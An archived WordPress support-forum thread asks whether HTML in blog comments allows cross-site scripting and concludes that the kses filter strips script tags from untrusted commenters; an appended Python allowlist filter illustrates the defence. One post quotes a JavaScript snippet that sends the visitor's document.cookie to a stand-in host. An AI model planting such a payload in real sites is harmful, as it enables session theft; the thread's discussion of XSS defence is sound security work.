[resolved] How to make comments safe? (11 posts)

  1. deko
    Posted 10 years ago #

    How risky is it to allow a commenter to use HTML tags in his comments?

    For example, what if the commenter tries something like this:

    malicious code here

    Does anyone know of a plug-in that addresses this?

  2. Chris_K
    Posted 10 years ago #

    Out of curiosity, what happened when you tried that? What was your test?

  3. deko
    Posted 10 years ago #

    var url = 'http://www.mysite.com/send_me_passwords.cgi';
    url = url + '?cookie=' + escape(document.cookie)
    document.write('<script src="'+url+'">');

    from: http://iamcal.com/publish/articles/php/processing_html/

    I think it would be best to disallow all markup in comments to avoid any risk.

    This plugin:


    Is supposed to:

    "Strip all HTML tags in comments to prevent malicious or malformed tags from destroying your pages"

I have not tested it. I downloaded it and it's only one script that appears to reference a non-existent function.

    What we need is built-in comment scrubbing.

  4. deko
    Posted 10 years ago #

    This looks promising:


    But the first line of the script is this:

    // requires HTMLSax3 package
    require_once 'XML/HTMLSax3.php';

    Does anyone know how to verify if my host's server has the HTMLSax3 package installed?

    Can this be verified using phpinfo.php?

  5. deko
    Posted 10 years ago #

    This is a better site to download HTML_Safe:


    I've tested and verified that a bug exists in 2.0.2, namely, that an unclosed markup tag, submitted in a comment, will affect the appearance of text outside of that comment, thus altering the display of your blog.

    But the more important question remains:

    Are WP blogs at risk of cross-site scripting (XSS) when users submit malicious code in the Comments form?

  6. davidchait
    Posted 10 years ago #

    I was pretty sure WP >did< some level of scrubbing. What have you tried that's worked?

  7. deko
    Posted 10 years ago #

    I don't know enough about XSS to test for a vulnerability, but I'm going to use HTML_Safe anyway, if only to squash the 'unclosed tag in comments' bug.

    I looked for codex documentation explaining why WP blogs are safe from XSS and other malicious code submitted in comments. I found this:


    Allows - if enabled - the user to post HTML markup or even Javascript code in posts, pages or comments.

    Note: Enabling this option for non-privileged users may result in their posting malicious code to your blog.


    I don't know if unfiltered_html is disabled by default, but unless there's some documentation assuring us that we're safe, it's best to assume we're not.

  8. robmil
    Posted 10 years ago #

    Definitely definitely safe. The unfiltered_html cap is only given to admins and certainly not to anonymous users or even registered ones.

    This is something that has been safe in the WP core for literally years.

  9. ringmaster
    Posted 10 years ago #

    unfiltered_html is granted initially only to users having the Administrator or Editor roles. Casual users visiting your site will have their comments stripped of tags that are not allowed, including script tags.

    When you are logged in as a user with the unfiltered_html capability, you are allowed to post script into comments. This is why you would be able to do this on your own blog.

    IIRC, kses is used to prevent unwanted markup from users without this capability.

  10. Ryan Boren
    WordPress Dev
    Posted 10 years ago #

    WP uses kses to filter comments. Users that have the unfiltered_html capability (Editors and Administrators) are not filtered. They are considered trusted.

  11. deko
    Posted 10 years ago #

    I did some testing with the kses file, and yes, it appears that unfiltered_html is allowed only for Admins and Editors.

I commented the <em> tag (from @allowedtags) and then tried marking up a comment with it to see if it had any effect - it didn't, unless I was logged in as Admin (indicating that html was filtered by kses otherwise).

    So kses is protecting us.

    kses doesn't catch unclosed tags in comments, but this is not a security problem.
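To show what the thread settles on (an allowlist filter like kses for untrusted commenters, a pass-through for users holding unfiltered_html, and closing the unclosed tags that HTML_Safe was brought in for), here is an added example. It is not WordPress's kses, and the ALLOWED table, CommentFilter, filter_comment and the sample comment are all constructed for this illustration.

```python
from html import escape
from html.parser import HTMLParser

# Constructed allowlist in the spirit of kses: tag -> attributes permitted on it.
ALLOWED = {"em": set(), "strong": set(), "code": set(),
           "a": {"href", "title"}, "blockquote": {"cite"}}


class CommentFilter(HTMLParser):
    """Rebuilds a comment keeping only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []  # stack used to close tags the commenter left open

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # disallowed tag (e.g. <script>) is dropped; its text survives as text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag]:
                continue  # drops event handlers such as onclick
            if name == "href" and not (value or "").lower().startswith(("http://", "https://")):
                continue  # drops javascript: and other non-http link schemes
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:  # close anything opened after it so nesting stays well-formed
            while self.open_tags:
                t = self.open_tags.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text is re-escaped, never trusted

    def result(self):
        while self.open_tags:  # the 'unclosed tag' bug: close what the comment left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def filter_comment(html, trusted=False):
    """trusted mirrors the unfiltered_html capability: Admins/Editors are passed through."""
    if trusted:
        return html
    p = CommentFilter()
    p.feed(html)
    p.close()
    return p.result()
```

Running it on a constructed comment such as `<em>Nice post<script>...</script><strong onclick="alert(1)">bye` yields the script body as plain text, `<strong>` without its handler, and the `</strong></em>` the commenter never wrote.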

Topic Closed

This topic has been closed to new replies.